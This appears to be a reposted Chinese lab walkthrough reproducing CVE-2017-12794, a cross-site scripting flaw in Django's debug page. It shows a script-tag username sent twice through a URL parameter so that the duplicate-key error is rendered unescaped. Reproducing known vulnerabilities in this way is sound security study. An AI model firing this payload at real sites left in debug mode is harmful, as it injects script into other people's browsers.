Django debug page XSS漏洞(CVE-2017-12794)

只谈情不闲聊 提交于 2020-02-26 02:11:19

1.创建个用户:ip:8000/create_user/?username=<script>alert(7)</script>

在这里插入图片描述

显示用户已创建。
2.触发漏洞,再次访问ip:8000/create_user/?username=<script>alert(7)</script>

在这里插入图片描述

3.触发异常:

duplicate key value violates unique constraint "xss_user_username_key"
DETAIL: Key (username)=(<script>alert(7)</script>) already exists.

在这里插入图片描述

4.这个异常被拼接进The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception,最后触发XSS。

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!